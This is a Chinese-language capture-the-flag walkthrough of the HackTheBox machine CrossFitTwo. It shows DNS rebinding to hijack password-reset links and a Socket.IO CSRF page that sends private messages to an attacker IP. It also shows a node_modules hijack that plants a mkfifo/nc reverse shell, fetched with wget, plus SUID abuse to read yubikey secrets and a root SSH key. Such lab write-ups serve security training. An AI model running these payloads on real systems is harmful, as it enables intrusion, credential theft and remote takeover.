根据前面relayd配置文件，可以知道配置的是*employees.crossfit.htb, 那么我们如果在前面添加其他字符，并且控制对应dns，那么就可能劫持密码重置链接

add_forward

unbound添加一条规则，将dns请求转发到我们的dns服务器：

1	unbound-control -c crossfit.conf -s 10.10.10.232 forward_add +i xemployees.crossfit.htb 10.10.14.14

dnschef

1	sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 10.10.14.14

直接这样得到响应，只允许localhost：

修改为127.0.0.1可以发送成功，但我们得不到请求：

dns rebinding

所以这里就是dns rebinding,通过dns rebinding得到重置密码链接格式：

两次dns以及请求速度要快：

sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 127.0.0.1
sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 10.10.14.14

GET /password-reset.php?token=xxx

CSRF

http://crossfit-club.htb是vue js，逆向调试发现Socket.IO，因为有dns rebinding，我们可以控制响应，我们可以将password-reset.php重定向到我们的包含socket.io-client.js的页面，然后响应XMLHttpRequest到nc

Unbound-control添加对应forward规则，

unbound-control -c crossfit.conf -s 10.10.10.232 forward_add +i xemployees.crossfit.htb 10.10.14.14
unbound-control -c crossfit.conf -s 10.10.10.232 forward_add +i miao.moe 10.10.14.14

sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb --fakeip 127.0.0.1
sudo python3 dnschef.py -i 10.10.14.14 --fakedomains xemployees.crossfit.htb,miao.moe --fakeip 10.10.14.14

会收到很多不同的消息，其中有一条是密码相关的：

1	{"sender_id":2,"content":"Hello David, I've added a user account for you with the password `NWBFcSe3ws4VDhTB`.","roomId":2,"_id":1118}

password-reset.php

1	<?php header("Location: http://miao.moe/x.html"); ?>

x.html

<html>
    <script src="http://crossfit-club.htb/socket.io/socket.io.js"></script>
    <script>
        var socket = io("http://crossfit-club.htb");
        socket.emit("user_join", { username : "administrator" });
        socket.on("private_recv", (data) => {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", "http://10.10.14.14:8000/?x=" + JSON.stringify(data), true);
            xhr.send();
        });
    </script>
</html>

user flag

得到的密码就是david ssh密码，登录得到user.txt:

1 2	ssh david@10.10.10.232 NWBFcSe3ws4VDhTB

提权信息

简单的枚举发现david和john都在sysadmins组，而root和john都在staff组，所以应该是要通过John：

david to john

默认是csh，切到/bin/sh后进行枚举：

1 2	find / -group sysadmins -ls 2>/dev/null 1244170 4 drwxrwxr-x 3 root sysadmins 512 Feb 3 04:45 /opt/sysadmin

发现一个statbot.js文件：

这个脚本是john用户定时运行：

1 2	crossfit2$ ls -al /tmp/chatbot.log -rw-r--r-- 1 john wheel 30982 May 12 06:39 /tmp/chatbot.log

node_modules搜索路径劫持

写log应该是用的log-to-file模块，

1 2	find / -type d -name 'log-to-file' -ls 2>/dev/null 1845012 4 drwxr-xr-x 2 root wheel 512 Jan 13 10:44 /usr/local/lib/node_modules/log-to-file

根据nodejs 文档：

https://nodejs.org/api/modules.html#modules_loading_from_node_modules_folders

我们可以在/opt/sysadmins写文件，如果在里面创建node_modules，优先级会比系统的module路径高

等待log执行，得到John shell：

statbot.js

const WebSocket = require('ws');
const fs = require('fs');
const logger = require('log-to-file');
const ws = new WebSocket("ws://gym.crossfit.htb/ws/");
function log(status, connect) {
  var message;
  if(status) {
    message = `Bot is alive`;
  }
  else {
    if(connect) {
      message = `Bot is down (failed to connect)`;
    }
    else {
      message = `Bot is down (failed to receive)`;
    }
  }
  logger(message, '/tmp/chatbot.log');
}
ws.on('error', function err() {
  ws.close();
  log(false, true);
})
ws.on('message', function message(data) {
  data = JSON.parse(data);
  try {
    if(data.status === "200") {
      ws.close()
      log(true, false);
    }
  }
  catch(err) {
      ws.close()
      log(false, false);
  }
});

app.js

const { exec } = require("child_process");

exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f", (error, stdout, stderr) => {
    if (error) {
        console.log(`error: ${error.message}`);
        return;
    }
    if (stderr) {
        console.log(`stderr: ${stderr}`);
        return;
    }
    console.log(`stdout: ${stdout}`);
});

// Export.
module.exports = logToFile;

exploit.sh

#!/bin/sh

mkdir -p /opt/sysadmin/node_modules
cp -r /usr/local/lib/node_modules/log-to-file /opt/sysadmin/node_modules/
rm /opt/sysadmin/node_modules/log-to-file/app.js
wget -q -O/opt/sysadmin/node_modules/log-to-file/app.js 10.10.14.14:7777/app.js

john to root

suid log

1 2	find / -type f -group staff -ls 2>/dev/null 1481580 20 -rwsr-s--- 1 root staff 9024 Jan 5 13:04 /usr/local/bin/log

这个log是用于读文件的：

yubikey

前面看到root登录和yubikey有关：

https://man.openbsd.org/man8/login_yubikey.8

所以可以读yubikey相关文件：

log /var/db/yubikey/root.key && log /var/db/yubikey/root.uid && log /var/db/yubikey/root.ctr && echo

6bf9a26475388ce998988b67eaa2ea87

a4ce1128bde4

985089 # 转成hex是0xf0801,最后的01是计数器，用到的是0f08

根据这些，可以使用yubico生成OTP：

https://github.com/Yubico/yubico-c

1	ykgenerate 6bf9a26475388ce998988b67eaa2ea87 a4ce1128bde4 0f08 c0a8 00 02

ssh私钥

查看change list，发现/root/.ssh/id_rsa，根据文档，存在备份：

https://man.openbsd.org/changelist

默认备份路径：

1	/var/backups/root_.ssh_id_rsa.current

然后log去读取，得到ssh私钥：

/etc/changelist

#	$OpenBSD: changelist,v 1.127 2020/09/13 10:03:46 ajacoutot Exp $
#
# List of files which the security script backs up and checks
# for modifications.
#
# Files prefixed with a '+' will have their checksums stored,
# not the actual files.
#

/etc/Distfile
/etc/acme-client.conf
/etc/adduser.conf
/etc/adduser.message
/etc/bgpd.conf
/etc/boot.conf
/etc/bootparams
/etc/changelist
/etc/chio.conf
/etc/crontab
/etc/csh.cshrc
/etc/csh.login
/etc/csh.logout
/etc/daily
/etc/daily.local
/etc/defaultdomain
/etc/dhclient.conf
/etc/dhcpd.conf
/etc/disktab
/etc/distfile
/etc/doas.conf
/etc/dvmrpd.conf
/etc/eigrpd.conf
/etc/ethers
/etc/exports
/etc/fbtab
/etc/fstab
/etc/ftpchroot
/etc/ftpusers
/etc/ftpwelcome
/etc/gettytab
/etc/group
/etc/hostapd.conf
+/etc/hostname.*
/etc/hosts
/etc/hosts.lpd
/etc/httpd.conf
/etc/ifstated.conf
+/etc/iked.conf
/etc/iked/local.pub
+/etc/iked/private/local.key
/etc/inetd.conf
/etc/installurl
+/etc/ipsec.conf
+/etc/isakmpd/isakmpd.conf
+/etc/isakmpd/isakmpd.policy
/etc/isakmpd/local.pub
+/etc/isakmpd/private/local.key
/etc/ksh.kshrc
/etc/ldapd.conf
/etc/ldpd.conf
/etc/locate.rc
+/etc/login.conf
/etc/login_ldap.conf
/etc/mail.rc
/etc/mail/aliases
/etc/mail/smtpd.conf
/etc/mail/spamd.conf
/etc/mailer.conf
/etc/man.conf
/etc/master.passwd
/etc/mk.conf
+/etc/moduli
/etc/monthly
/etc/monthly.local
/etc/motd
/etc/mrouted.conf
/etc/mtree/4.4BSD.dist
/etc/mtree/BSD.x11.dist
/etc/mygate
/etc/myname
/etc/netgroup
/etc/netstart
/etc/newsyslog.conf
/etc/npppd/npppd.conf
+/etc/npppd/npppd-users
/etc/ntpd.conf
/etc/ospf6d.conf
/etc/ospfd.conf
/etc/passwd
/etc/pf.conf
/etc/pf.os
/etc/printcap
/etc/profile
/etc/protocols
+/etc/pwd.db
/etc/rad.conf
+/etc/radiusd.conf
/etc/rbootd.conf
/etc/rc
/etc/rc.conf
/etc/rc.conf.local
/etc/rc.d/rc.subr
/etc/rc.local
/etc/rc.securelevel
/etc/rc.shutdown
/etc/relayd.conf
/etc/remote
/etc/resolv.conf
/etc/resolv.conf.tail
/etc/ripd.conf
/etc/rpc
/etc/rpki/afrinic.tal
/etc/rpki/apnic.tal
/etc/rpki/arin.tal
/etc/rpki/lacnic.tal
/etc/rpki/ripe.tal
/etc/sasyncd.conf
/etc/sensorsd.conf
/etc/services
/etc/shells
+/etc/snmpd.conf
+/etc/soii.key
+/etc/spwd.db
/etc/ssh/ssh_config
+/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
+/etc/ssh/ssh_host_ecdsa_key
/etc/ssh/ssh_host_ecdsa_key.pub
+/etc/ssh/ssh_host_ed25519_key
/etc/ssh/ssh_host_ed25519_key.pub
+/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
+/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/sshd_config
/etc/ssl/cert.pem
/etc/suid_profile
/etc/sysctl.conf
/etc/syslog.conf
/etc/switchd.conf
/etc/sysmerge.ignore
/etc/ttys
/etc/unwind.conf
/etc/usermgmt.conf
/etc/vm.conf
/etc/weekly
/etc/weekly.local
/etc/wsconsctl.conf
/etc/ypldap.conf
/root/.Xdefaults
/root/.cshrc
/root/.login
/root/.profile
/root/.rhosts
/root/.shosts
/root/.ssh/authorized_keys
/root/.ssh/authorized_keys2
/root/.ssh/id_rsa
/var/cron/at.allow
/var/cron/at.deny
/var/cron/cron.allow
/var/cron/cron.deny
/var/cron/tabs/root
/var/db/unwind.key
+/var/nsd/etc/nsd.conf
/var/unbound/etc/unbound.conf
/var/yp/Makefile.main
/var/yp/Makefile.yp
/.cshrc
/.profile

root id_rsa

root flag

生成Yubikey密码，使用公钥及密码登录，得到root.txt:

1 2	➜ yubico-c git:(master) ✗ ./ykgenerate 6bf9a26475388ce998988b67eaa2ea87 a4ce1128bde4 0f08 c0a8 00 02 cttndvdheldlhjfubluidkckfvgjvbeb

CrossFitTwo - HackTheBox